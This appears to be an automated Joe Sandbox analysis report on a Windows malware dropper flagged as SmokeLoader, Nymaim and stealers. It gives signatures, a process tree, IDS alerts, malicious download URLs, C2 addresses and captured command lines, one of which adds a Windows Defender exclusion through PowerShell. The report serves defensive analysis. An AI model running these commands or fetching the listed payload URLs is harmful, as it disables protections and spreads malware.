Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
T4IoJqcAwY.exe

Overview

General Information

Sample Name:T4IoJqcAwY.exe
Analysis ID:631543
MD5:a9aea2720aa1e020bf30e7f17463bf2d
SHA1:2bb5d89679bc041680932db0757e1a53f2db37e5
SHA256:fab5f16b7b7f88aad46914ea2a932c11e376d2c44da5cd33bc16ecb393f084c3
Tags:Amadeyexe
Infos:

Detection

Nymaim, SmokeLoader, Zealer Stealer, onlyLogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected SmokeLoader
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Snort IDS alert for network traffic
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Zealer Stealer
Yara detected onlyLogger
Yara detected Nymaim
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
PE file has a writeable .text section
Tries to evade debugger and weak emulator (self modifying code)
May check the online IP address of the machine
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Found many strings related to Crypto-Wallets (likely being stolen)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
PE file contains section with special chars
Detected VMProtect packer
Creates HTML files with .exe extension (expired dropper behavior)
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Obfuscated command line found
PE file has nameless sections
Machine Learning detection for dropped file
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Queries keyboard layouts
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Entry point lies outside standard sections
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Classification

Process Tree

  • System is w10x64
  • T4IoJqcAwY.exe (PID: 492 cmdline: "C:\Users\user\Desktop\T4IoJqcAwY.exe" MD5: A9AEA2720AA1E020BF30E7F17463BF2D)
    • setup_install.exe (PID: 5880 cmdline: "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exe" MD5: 9B3B6EB4710B6B689E6D3C8AC68347FB)
      • conhost.exe (PID: 1388 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1984 cmdline: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp" MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • powershell.exe (PID: 2436 cmdline: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • cmd.exe (PID: 2364 cmdline: C:\Windows\system32\cmd.exe /c 6282924fea1c3_82ebfc59.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 2960 cmdline: C:\Windows\system32\cmd.exe /c 628292505a6c3_91a0215e.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 388 cmdline: C:\Windows\system32\cmd.exe /c 62829251169ea_9dc91d.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • 62829251169ea_9dc91d.exe (PID: 5156 cmdline: 62829251169ea_9dc91d.exe MD5: 171F2967683A3DF041312E473FA664E5)
          • 62829251169ea_9dc91d.exe (PID: 6264 cmdline: "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exe" -h MD5: 171F2967683A3DF041312E473FA664E5)
      • cmd.exe (PID: 1748 cmdline: C:\Windows\system32\cmd.exe /c 62829252dc457_91e450cbce.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • 62829252dc457_91e450cbce.exe (PID: 2276 cmdline: 62829252dc457_91e450cbce.exe MD5: ABA047B6FD3151E4EC49575B507552F4)
          • 62829252dc457_91e450cbce.tmp (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\is-MLHOA.tmp\62829252dc457_91e450cbce.tmp" /SL5="$B0054,921114,831488,C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exe" MD5: 266673B16AB08A498DEB528139DC7213)
      • cmd.exe (PID: 3392 cmdline: C:\Windows\system32\cmd.exe /c 62829254ab49d_fc210c4a.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • 62829254ab49d_fc210c4a.exe (PID: 1756 cmdline: 62829254ab49d_fc210c4a.exe MD5: 20F7806A7719B1F94B8B4756F786CE36)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • cmd.exe (PID: 480 cmdline: C:\Windows\system32\cmd.exe /c 6282925776f05_4ee107b.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 3196 cmdline: C:\Windows\system32\cmd.exe /c 62829258f111c_8df26f0c7d.exe /mixtwo MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • 62829258f111c_8df26f0c7d.exe (PID: 4516 cmdline: 62829258f111c_8df26f0c7d.exe /mixtwo MD5: 5E90B6DD2E1A6B5154E89AB7A9274E4F)
          • WerFault.exe (PID: 6852 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 548 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
      • cmd.exe (PID: 1532 cmdline: C:\Windows\system32\cmd.exe /c 6282925ab52f1_fdd12e5.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 4136 cmdline: C:\Windows\system32\cmd.exe /c 6282925b8abce_97dd7946.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 5828 cmdline: C:\Windows\system32\cmd.exe /c 6282925c504be_44b654a9fe.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • 6282925c504be_44b654a9fe.exe (PID: 6240 cmdline: 6282925c504be_44b654a9fe.exe MD5: 157B2A59AC5BC85091675C965F4318FD)
          • cmd.exe (PID: 7004 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "6282925c504be_44b654a9fe.exe" /f & erase "C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • taskkill.exe (PID: 7100 cmdline: taskkill /im "6282925c504be_44b654a9fe.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 408 cmdline: C:\Windows\system32\cmd.exe /c 6282925d5ee10_0da12a.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • 6282925d5ee10_0da12a.exe (PID: 6256 cmdline: 6282925d5ee10_0da12a.exe MD5: 5AD462630A7EFCB7E44DB91AB95A82B2)
          • 6282925d5ee10_0da12a.tmp (PID: 6644 cmdline: "C:\Users\user\AppData\Local\Temp\is-JH50O.tmp\6282925d5ee10_0da12a.tmp" /SL5="$7022C,506127,422400,C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exe" MD5: A5EA5F8AE934AB6EFE216FC1E4D1B6DC)
            • lBo5.exe (PID: 7116 cmdline: "C:\Users\user\AppData\Local\Temp\is-OATKC.tmp\lBo5.exe" /S /UID=1405 MD5: 05CCFCAFE888DD83E0969080E8897AEC)
      • cmd.exe (PID: 6152 cmdline: C:\Windows\system32\cmd.exe /c 6282925ea53e7_da60dc03.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • svchost.exe (PID: 6168 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6448 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • WmiPrvSE.exe (PID: 6688 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • rundll32.exe (PID: 7132 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",global MD5: 73C519F050C20580F8A62C849D49215A)
    • rundll32.exe (PID: 5652 cmdline: rundll32.exe "C:\Users\user\AppData\Local\Temp\db.dll",global MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • svchost.exe (PID: 1020 cmdline: c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 2372 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3900 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000016.00000000.329990024.0000000000400000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
    00000016.00000000.333254439.0000000000400000.00000040.00000001.01000000.0000000D.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
      00000016.00000000.332457104.0000000002D10000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_NymaimYara detected NymaimJoe Security
        0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000033.00000002.429034900.0000000004640000.00000040.00001000.00020000.00000000.sdmpSUSP_XORed_MSDOS_Stub_MessageDetects suspicious XORed MSDOS stub messageFlorian Roth
          • 0x53d66:$xo1: \x19%$>m=?"*?, m.,##"9m/(m?8#m$#m\x09\x02\x1Em ")(
          Click to see the 29 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          18.2.62829254ab49d_fc210c4a.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            22.3.62829258f111c_8df26f0c7d.exe.4810000.0.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
              22.0.62829258f111c_8df26f0c7d.exe.2d10e67.4.raw.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                18.3.62829254ab49d_fc210c4a.exe.2cf0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                  22.0.62829258f111c_8df26f0c7d.exe.400000.0.unpackJoeSecurity_NymaimYara detected NymaimJoe Security
                    Click to see the 16 entries

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:192.168.2.4185.215.113.7049792121892850286 05/21/22-09:32:10.361605
                    SID:2850286
                    Source Port:49792
                    Destination Port:12189
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:116.202.0.187192.168.2.480498772035911 05/21/22-09:33:10.268775
                    SID:2035911
                    Source Port:80
                    Destination Port:49877
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4194.36.177.10649835135112850027 05/21/22-09:32:49.349146
                    SID:2850027
                    Source Port:49835
                    Destination Port:13511
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4206.81.21.19449889802834928 05/21/22-09:33:25.141446
                    SID:2834928
                    Source Port:49889
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.48.8.8.853989532023883 05/21/22-09:31:49.982019
                    SID:2023883
                    Source Port:53989
                    Destination Port:53
                    Protocol:UDP
                    Classtype:Potentially Bad Traffic
                    Timestamp:192.168.2.4194.36.177.10649835135112850286 05/21/22-09:33:03.918933
                    SID:2850286
                    Source Port:49835
                    Destination Port:13511
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:194.36.177.106192.168.2.413511498352850353 05/21/22-09:32:49.444189
                    SID:2850353
                    Source Port:13511
                    Destination Port:49835
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.48.8.8.850661532016778 05/21/22-09:32:45.268161
                    SID:2016778
                    Source Port:50661
                    Destination Port:53
                    Protocol:UDP
                    Classtype:Potentially Bad Traffic
                    Timestamp:192.168.2.48.8.8.859510532027758 05/21/22-09:32:46.126333
                    SID:2027758
                    Source Port:59510
                    Destination Port:53
                    Protocol:UDP
                    Classtype:Potentially Bad Traffic
                    Timestamp:192.168.2.48.8.8.849320532023883 05/21/22-09:32:46.562882
                    SID:2023883
                    Source Port:49320
                    Destination Port:53
                    Protocol:UDP
                    Classtype:Potentially Bad Traffic
                    Timestamp:192.168.2.4185.215.113.7049792121892850027 05/21/22-09:32:10.063096
                    SID:2850027
                    Source Port:49792
                    Destination Port:12189
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:194.36.177.106192.168.2.413511498302850353 05/21/22-09:32:47.473603
                    SID:2850353
                    Source Port:13511
                    Destination Port:49830
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.491.189.114.2749820802850316 05/21/22-09:32:45.051524
                    SID:2850316
                    Source Port:49820
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Attempted Administrator Privilege Gain
                    Timestamp:192.168.2.4193.109.246.6249836802850316 05/21/22-09:32:49.754507
                    SID:2850316
                    Source Port:49836
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Attempted Administrator Privilege Gain
                    Timestamp:192.168.2.434.88.62.13549776802839343 05/21/22-09:31:23.607844
                    SID:2839343
                    Source Port:49776
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:185.215.113.70192.168.2.412189497922850353 05/21/22-09:32:10.294870
                    SID:2850353
                    Source Port:12189
                    Destination Port:49792
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4194.36.177.10649830135112850027 05/21/22-09:32:47.315523
                    SID:2850027
                    Source Port:49830
                    Destination Port:13511
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.4151.115.10.149765802839343 05/21/22-09:31:05.322496
                    SID:2839343
                    Source Port:49765
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Potentially Bad Traffic
                    Timestamp:192.168.2.4194.36.177.10649830135112850286 05/21/22-09:33:01.337176
                    SID:2850286
                    Source Port:49830
                    Destination Port:13511
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:192.168.2.441.41.255.23549810802850316 05/21/22-09:32:42.669427
                    SID:2850316
                    Source Port:49810
                    Destination Port:80
                    Protocol:TCP
                    Classtype:Attempted Administrator Privilege Gain

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: https://v.xyzgamev.com/25.htmlAvira URL Cloud: Label: malware
                    Source: https://doja-cat.s3.pl-waw.scw.cloud/nunchucks/rec-fnpj3agqpa83jpen.exeAvira URL Cloud: Label: malware
                    Source: https://yuuichirou-hanma.s3.pl-waw.scw.cloud/ultimate/hand-uqc3q25p48egzty7.exeAvira URL Cloud: Label: malware
                    Source: https://yuuichirou-hanma.s3.pl-waw.scw.cloud/ultimate/publish-gcdexh7kcw9xhrx4.exeAvira URL Cloud: Label: malware
                    Source: https://v.xyzgamev.com/login.htmlAvira URL Cloud: Label: malware
                    Source: http://104.155.207.188/win.pacAvira URL Cloud: Label: malware
                    Source: https://v.xyzgamev.com/23.htmlAvira URL Cloud: Label: malware
                    Source: http://203.159.80.49/library.phpAvira URL Cloud: Label: malware
                    Source: http://cristaline.s3.pl-waw.scw.cloud/adv-matrix/poweroff.exeAvira URL Cloud: Label: malware
                    Source: https://yuuichirou-hanma.s3.pl-waw.scw.cloud/ultimate/up-to-qqpuv99897uygdj2.exeAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exeAvira: detection malicious, Label: HEUR/AGEN.1219027
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\D4[1].fileAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Multi AV Scanner detection for submitted file
                    Source: T4IoJqcAwY.exeVirustotal: Detection: 56%Perma Link
                    Source: T4IoJqcAwY.exeReversingLabs: Detection: 70%
                    Multi AV Scanner detection for domain / URL
                    Source: https://v.xyzgamev.com/25.htmlVirustotal: Detection: 13%Perma Link
                    Source: https://connectini.net/S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7Virustotal: Detection: 5%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\D3[1].fileMetadefender: Detection: 51%Perma Link
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\D3[1].fileReversingLabs: Detection: 92%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\soft[1]ReversingLabs: Detection: 53%
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\D4[1].fileReversingLabs: Detection: 35%
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeMetadefender: Detection: 42%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeReversingLabs: Detection: 60%
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeMetadefender: Detection: 48%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeReversingLabs: Detection: 84%
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeMetadefender: Detection: 17%Perma Link
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeReversingLabs: Detection: 30%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\soft[1]Joe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\MIXONE[1].fileJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829258f111c_8df26f0c7d.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ea53e7_da60dc03.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925d5ee10_0da12a.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\D4[1].fileJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925c504be_44b654a9fe.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282924fea1c3_82ebfc59.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\D3[1].fileJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\YQEfLiaEJum5xoC6Kk\Cleaner.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925b8abce_97dd7946.exeJoe Sandbox ML: detected
                    Source: 22.3.62829258f111c_8df26f0c7d.exe.5c24190.18.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 22.3.62829258f111c_8df26f0c7d.exe.59cf9b8.16.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: 22.3.62829258f111c_8df26f0c7d.exe.5bb3988.19.unpackAvira: Label: TR/Patched.Ren.Gen
                    Source: T4IoJqcAwY.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829254ab49d_fc210c4a.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: unknownHTTPS traffic detected: 172.67.188.70:443 -> 192.168.2.4:49758 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.4:49764 version: TLS 1.2
                    Source: Binary string: C:\xar\zawekagohuzexo y.pdb source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404732639.000000000599E000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.412630998.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404830454.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403316521.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.409031718.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403685832.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404362762.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403002087.0000000005822000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.402470240.000000000599E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\cigu doyokixiyika.pdb source: T4IoJqcAwY.exe, 00000000.00000003.252745027.0000000003C3B000.00000004.00001000.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000000.278752671.0000000000401000.00000020.00000001.01000000.0000000D.sdmp
                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: T4IoJqcAwY.exe, 00000000.00000003.252745027.0000000003C3B000.00000004.00001000.00020000.00000000.sdmp, 6282925776f05_4ee107b.exe, 00000014.00000000.278249927.0000000001018000.00000002.00000001.01000000.0000000C.sdmp, 6282925776f05_4ee107b.exe, 00000014.00000002.517791843.0000000001018000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: BC:\cigu doyokixiyika.pdb source: T4IoJqcAwY.exe, 00000000.00000003.252745027.0000000003C3B000.00000004.00001000.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000000.278752671.0000000000401000.00000020.00000001.01000000.0000000D.sdmp
                    Source: Binary string: C:\velelawovid.pdb source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmp, 62829254ab49d_fc210c4a.exe, 00000012.00000000.276485648.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\lafowapewozu72-recup.pdb source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.423352963.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.426200970.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.430828364.0000000005E66000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.428321954.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.427455632.00000000059CF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.431562259.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429105140.00000000059CF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.434306290.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429512950.00000000059F5000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.440901157.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.428978878.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.435223737.0000000005FBB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.436121107.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.433193147.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.432385043.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.426632292.0000000005822000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: 675C:\xar\zawekagohuzexo y.pdb source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404732639.000000000599E000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.412630998.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404830454.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403316521.00000000059CB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.409031718.00000000059F7000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403685832.00000000059E1000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.404362762.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.403002087.0000000005822000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.402470240.000000000599E000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: ZC:\lafowapewozu72-recup.pdb source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.423352963.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.426200970.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.430828364.0000000005E66000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.428321954.00000000059DF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.427455632.00000000059CF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.431562259.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429105140.00000000059CF000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.434306290.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429512950.00000000059F5000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.440901157.0000000005F1D000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.428978878.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 